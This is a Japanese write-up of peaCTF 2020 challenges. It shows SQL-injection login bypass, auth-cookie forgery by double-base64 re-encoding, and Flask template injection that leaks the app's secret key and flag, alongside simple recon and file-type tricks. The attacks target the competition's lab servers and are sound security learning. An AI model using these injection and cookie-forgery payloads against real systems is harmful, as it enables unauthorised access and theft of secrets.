PeaCTF 2020: Write up
Web Exploitation
Eff-twelve
ソースコードを見るだけ。
<!--FLAG: peaCTF{b3a96a5c-71df-455d-8035-0df702546173}-->
Bots
/robots.txt
にアクセスすると
User-agent: * Sitemap: /sitemap.xml
/sitemap.xml
にアクセスすると
<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9" xmlns:xhtml="http://www.w3.org/1999/xhtml"> <script/> <script/> <url> <loc>/index.html</loc> <lastmod>2019-04-10T09:51:57+06:00</lastmod> </url> <url> <loc>/97FXwpouwwbmrt7dqxf53AEbiQkmuazB.html</loc> <lastmod>2019-04-10T09:51:57+06:00</lastmod> </url> </urlset>
/97FXwpouwwbmrt7dqxf53AEbiQkmuazB.html
にアクセスするとFlagがある。
Secure Admin
username='+OR+1=1#&password='
でPOSTすると
HTTP/1.1 200 OK Server: nginx/1.16.1 Date: Sat, 24 Oct 2020 11:34:07 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/7.4.0RC6 Content-Length: 81 Login success. Welcome! Your flag is peaCTF{2be8b136-325a-40ff-a6b3-6cb1dba72c96}
Secure Admin 2
POST /login.php HTTP/1.1 Host: 45.32.128.108:28064 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:81.0) Gecko/20100101 Firefox/81.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: ja,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 29 Origin: http://45.32.128.108:28064 Connection: close Referer: http://45.32.128.108:28064/ Cookie: _auth=WVdSdGFXNDZabUZzYzJVPQ== Upgrade-Insecure-Requests: 1 username=admin&password=admin
Cookie
の_auth
の値がbase64でエンコードされてて怪しいので
$ echo -n 'WVdSdGFXNDZabUZzYzJVPQ==' | base64 -d | base64 -d admin:false
なので
$ echo -n 'admin:true' | base64 | base64 WVdSdGFXNDZkSEoxWlE9PQo=
でPOSTするだけ
flaskookies
サーバサイドテンプレートインジェクションの脆弱性があり
name={{+config+}}
でPOSTすると
<Config {'ENV': 'production', 'DEBUG': False, 'TESTING': False, 'PROPAGATE_EXCEPTIONS': None, 'PRESERVE_CONTEXT_ON_EXCEPTION': None, 'SECRET_KEY': b'\x7f:&\xcaKu\x9c\x88\x00S\xd3wC\x01"\xaa\xbf\xec8H{|9\xe7', 'PERMANENT_SESSION_LIFETIME': datetime.timedelta(days=31), 'USE_X_SENDFILE': False, 'SERVER_NAME': None, 'APPLICATION_ROOT': '/', 'SESSION_COOKIE_NAME': 'session', 'SESSION_COOKIE_DOMAIN': False, 'SESSION_COOKIE_PATH': None, 'SESSION_COOKIE_HTTPONLY': True, 'SESSION_COOKIE_SECURE': False, 'SESSION_COOKIE_SAMESITE': None, 'SESSION_REFRESH_EACH_REQUEST': True, 'MAX_CONTENT_LENGTH': None, 'SEND_FILE_MAX_AGE_DEFAULT': datetime.timedelta(seconds=43200), 'TRAP_BAD_REQUEST_ERRORS': None, 'TRAP_HTTP_EXCEPTIONS': False, 'EXPLAIN_TEMPLATE_LOADING': False, 'PREFERRED_URL_SCHEME': 'http', 'JSON_AS_ASCII': True, 'JSON_SORT_KEYS': True, 'JSONIFY_PRETTYPRINT_REGULAR': False, 'JSONIFY_MIMETYPE': 'application/json', 'TEMPLATES_AUTO_RELOAD': None, 'MAX_COOKIE_SIZE': 4093, 'flag': 'peaCTF{61c3d4bc-bb7f-451a-80aa-d6bc485b6e4e}\n'}>.1
flagが含まれたレスポンスが返ってくる。
Misc
Corrupt
$ file filetype.txt filetype.txt: PNG image data, 848 x 242, 8-bit/color RGBA, non-interlaced $ mv filetype.txt filetype.png
General Skills
Warm-up 0
$ ssh peactf@45.32.128.108 -p28058
でsshを接続する。
適当にコマンド打ってたらflagがでてきた。
peactf@24414320bbe0:~/warm-up-1$ cat */*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/* cat: 10f9357a7fac9f8f31fdda5c18f382d4/f2819060afbbbf272fcbd6b6e5b8e888/67fdc7da6abdd2e13ccd06d03c7f6ed9/6cb32a3f3bfb34892d818d9817462a57/2bc6bd841f6392b899430648f2713306/a976fe7fc9c871b0090a5a4df73047ff/7b8dc35d8c370eb90969fa0ce9e077dd/e19595bffbbcde2416a3869977497551/575dcacf949278cffc01d88b14ce8943/d8f70020a6af45a3e5cbd26dfda4df84/f6fc10fc9bc26eded5bd3b47395543cb/13c6f06242287e3e7ca9c0d5e78874c0/20c88d805bdf6907e8bb5fbc0872e78f/2948c8cb5e4bc8502afd55c5534b2a00/cbc277a31de58bc73661e65354bbf4dd/d62ddd73380cb2d78e43d2cfb115024c/6f45a03c1c16a50af7bb41b38b3389d5/2baea4352b4a0ffc3aa1ecd79923c733/04e93cc067887f2b12927677d4afceb0/46fe9148c7d3c7bd7816b33150eed073: Is a directory peaCTF{0307e8c9-28f3-4eb0-b477-8f894ea099ad}peaCTF{0307e8c9-28f3-4eb0-b477-8f894ea099ad}cat: 83370d0db0a379ecbcf3712438e5a2d5/f4d867be7c1e73c30adc5ff5d250ab1e/742d095ed2fd662103f1109190915681/2879994fff5740f88b11a526639dd2ea/8c6e7633dd7abc4c4c1d638db3efeef2/4132d59ad394bb625c0a73f08c787299/f743ac55bfe998088df77611fafbc37a/43f86e20ccb49cf84fddd02b48a13e91/215cb96942bf38538acb429a977786b4/f936451b5dfc811d590efe84796b3603/115c7b3da791fdee1dfbbe99d4b4855b/2aa9fe49e3d463520ecafa4e73864ef4/8fbfab97e9d3c0093c6821aa80ee5890/68bb4d97da240cf334a49b387ebdf682/61e43e5731f259ce39bd351329b75aae/07e7f165fb485c994994cd8506aec813/cbd53cb7b03a946fa64ca9e6bd1057e2/9cde2ff360268b6afaa7b85f70205c68/c331b1086c98118a70ea9269c784de6e/a2f680bf6ce1170240d53c8a421a4346: Is a directory peaCTF{0307e8c9-28f3-4eb0-b477-8f894ea099ad}peaCTF{0307e8c9-28f3-4eb0-b477-8f894ea099ad}peaCTF{0307e8c9-28f3-4eb0-b477-8f894ea099ad}peaCTF{0307e8c9-28f3-4eb0-b477-8f894ea099ad}cat: f5ad680e0142e8f0834325b61feceee7/55ac7c6cad407189c37d25f0d31c4af0/66ee00647434e499e11532be9f7225a4/87970f657f63eb2624b5a149b4d4c99f/d338cf937923618f103ce9d0186da1a0/2b2d393c32bef3ca9461ac6edd279289/4d7d7ee378382a2164ab5168826a002e/6e670f25e01baf7f56868130e131bf25/4edfdd8562c59422dcd2a4b3cc6e3f2c/4cdc6806225fbd266ca5d6da20750ba1/31d58b08c604c14c85814e05fb9c6749/50e578a9617796d83b1b906d61614e7b/5ee0983bc96ebe70d50f8854239e2b51/d6a068548992e87131c4e40f6493f68b/469f14ab42d8f92f8b31eef0c8a2f28c/77882f6d68ccf3f257fb3c0784e8e238/94afaa03edbf1347aca0afba2186579f/33746a4bdfcfe234658b33e910576c27/4e516ed4e7771bfadc06bf3aa7ef704e/fcc1742a517e2d32f16a3f25852c2dbf: Is a directory